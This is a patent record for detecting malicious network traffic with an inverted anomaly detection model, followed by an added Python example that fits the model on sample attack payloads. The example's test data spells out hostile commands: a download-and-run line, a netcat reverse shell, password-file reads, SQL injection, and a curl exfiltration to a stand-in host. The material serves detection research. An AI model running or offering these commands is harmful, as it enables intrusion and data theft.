US 11,991,199 B2
Malicious traffic detection with anomaly detection modeling
Stefan Achleitner, Arlington, VA (US); and Chengcheng Xu, Santa Clara, CA (US)
Assigned to Palo Alto Networks, Inc., Santa Clara, CA (US)
Filed by Palo Alto Networks, Inc., Santa Clara, CA (US)
Filed on Jan. 27, 2023, as Appl. No. 18/160,834.
Application 18/160,834 is a continuation of application No. 16/999,865, filed on Aug. 21, 2020, granted, now 11,616,798.
Prior Publication US 2023/0179618 A1, Jun. 8, 2023
This patent is subject to a terminal disclaimer.
Int. Cl. H04L 9/40 (2022.01)
CPC H04L 63/1425 (2013.01) [H04L 63/1416 (2013.01)] 18 Claims
OG exemplary drawing
 
1. A method comprising:
generating a first plurality of feature vectors for unstructured payloads of one or more malicious traffic sessions, wherein generating the first plurality of feature vectors is based, at least in part, on a plurality of malicious features for the unstructured payloads;
training an anomaly detection model on the first plurality of feature vectors to detect malicious unstructured payloads as non-anomalous and benign unstructured payloads as anomalous; and
based, at least in part, on a false positive rate of the trained anomaly detection model satisfying a performance criterion, wherein the false positive rate comprises a rate of false positives in classifications of the trained anomaly detection model on a second plurality of feature vectors,
updating the plurality of malicious features; and
deploying the trained anomaly detection model.
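Claim 1 inverts the usual anomaly-detection setup: the model is fit only on feature vectors of malicious payloads, so malicious traffic is the in-distribution (non-anomalous) class and benign traffic is what should look anomalous, and the false positive rate measured on a second, held-out set of vectors gates the feature update and the deployment. The following is an added illustration of that pipeline, not code from the patent or from Palo Alto Networks. It uses a per-feature interval ("box") model as a stand-in for the unspecified anomaly detection model, a hand-written set of malicious features (shell metacharacters, quotes, SQL keywords, path traversal), and a few constructed payloads; the loop direction (add a candidate feature while the false positive rate fails the criterion, deploy once it passes) is this example's reading of the claim, and all names in it are assumptions.

```python
"""Inverted anomaly detection: fit on malicious payloads only, measure the
false positive rate on held-out benign payloads, update the feature set,
deploy. Added example; payloads are constructed and the box model is a
stand-in for the patent's (unspecified) anomaly detection model."""

# '&' is deliberately not a shell metacharacter here: it separates form fields.
SHELL_META = frozenset(b";|`$")
SQL_WORDS = (b"union", b"select", b"from", b" or ")

# Feature extractors over unstructured (raw bytes) payloads.
def f_length(p): return float(len(p))
def f_field_count(p): return float(p.count(b"="))
def f_shell_meta(p): return float(sum(1 for c in p if c in SHELL_META))
def f_quotes(p): return float(p.count(b"'"))
def f_sql_words(p):
    low = p.lower()
    return float(sum(low.count(w) for w in SQL_WORDS))
def f_traversal(p): return float(p.count(b"../"))
def f_indicator_total(p):
    # Aggregate attack-indicator count. Its minimum over the malicious training
    # set is >= 1, which is what lets a box model reject an all-zero benign vector.
    return f_shell_meta(p) + f_quotes(p) + f_sql_words(p) + f_traversal(p)

class BoxAnomalyModel:
    """Fit on malicious vectors only. A vector is non-anomalous (verdict:
    malicious) if every feature lies within the range seen in training."""
    def __init__(self, features):
        self.features = list(features)          # list of (name, extractor)
        self.lo = self.hi = None
    def vectorize(self, payloads):
        return [[f(p) for _, f in self.features] for p in payloads]
    def fit(self, malicious_payloads):
        vectors = self.vectorize(malicious_payloads)
        self.lo = [min(col) for col in zip(*vectors)]
        self.hi = [max(col) for col in zip(*vectors)]
        return self
    def is_anomalous(self, payload):
        v = [f(payload) for _, f in self.features]
        return any(x < lo or x > hi for x, lo, hi in zip(v, self.lo, self.hi))
    def is_malicious(self, payload):            # deployment-time verdict
        return not self.is_anomalous(payload)

def false_positive_rate(model, benign_payloads):
    """Share of benign payloads classified non-anomalous, i.e. flagged malicious."""
    return sum(model.is_malicious(p) for p in benign_payloads) / len(benign_payloads)

def detection_rate(model, malicious_payloads):
    return sum(model.is_malicious(p) for p in malicious_payloads) / len(malicious_payloads)

def train_update_deploy(mal_train, benign_eval, base_features, candidates, max_fpr):
    """Train, measure FPR on the held-out (second) set, update the malicious
    features while the criterion is not met, deploy once it is.
    Returns (model, history); history holds (feature_count, fpr) per round."""
    features, candidates, history = list(base_features), list(candidates), []
    while True:
        model = BoxAnomalyModel(features).fit(mal_train)
        fpr = false_positive_rate(model, benign_eval)
        history.append((len(features), fpr))
        if fpr <= max_fpr or not candidates:
            return model, history                # deploy
        features.append(candidates.pop(0))       # update the malicious features

# Constructed sample payloads (not from the patent).
MALICIOUS_TRAIN = [
    b"q=1;cat /etc/passwd",
    b"user=admin' OR '1'='1",
    b"cmd=;wget http://x/y.sh|sh",
    b"id=1 UNION SELECT user,password FROM users",
    b"path=../../../../etc/shadow",
    b"in=`nc -e /bin/sh 10.0.0.1 4444`",
]
BENIGN_EVAL = [
    b"name=alice&city=paris",
    b"q=security+conference+2024",
    b"comment=that's fine by me",     # apostrophe: the one benign FP below
    b"page=3&sort=date_desc",
    b"email=bob%40example.org",
]
MALICIOUS_EVAL = [
    b"file=../../../etc/hosts",
    b"name=bob' OR 1=1 -- ",
    b"cmd=ls;id;cat /etc/hostname",
    b"x=1; cat /etc/passwd | base64 | curl -d @- http://evil.example/u",  # longer than any training sample
]
BASE_FEATURES = [("length", f_length), ("field_count", f_field_count)]
CANDIDATE_FEATURES = [("shell_meta", f_shell_meta), ("quotes", f_quotes),
                      ("sql_words", f_sql_words), ("traversal", f_traversal),
                      ("indicator_total", f_indicator_total)]

def run_demo(max_fpr=0.2):
    model, history = train_update_deploy(
        MALICIOUS_TRAIN, BENIGN_EVAL, BASE_FEATURES, CANDIDATE_FEATURES, max_fpr)
    return {"history": history,
            "features": [name for name, _ in model.features],
            "fpr": history[-1][1],
            "detection_rate": detection_rate(model, MALICIOUS_EVAL)}

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Two things the run makes visible that the claim text does not. First, with only non-discriminative features (length, field count) the model fit on malicious data accepts every benign payload, and adding the individual indicator features one at a time does not help, because each has a minimum of zero on the malicious training set; the false positive rate only drops once a feature whose malicious-side minimum is above typical benign values (the aggregate indicator count) is added, which is the kind of feature update the claim's criterion is meant to drive. Second, the residual errors are instructive: the apostrophe in natural-language text is the one false positive, and the long exfiltration payload is missed because a length feature puts it outside the range of the malicious training data, so a practitioner would want a recall check on the second set alongside the false positive rate before deploying.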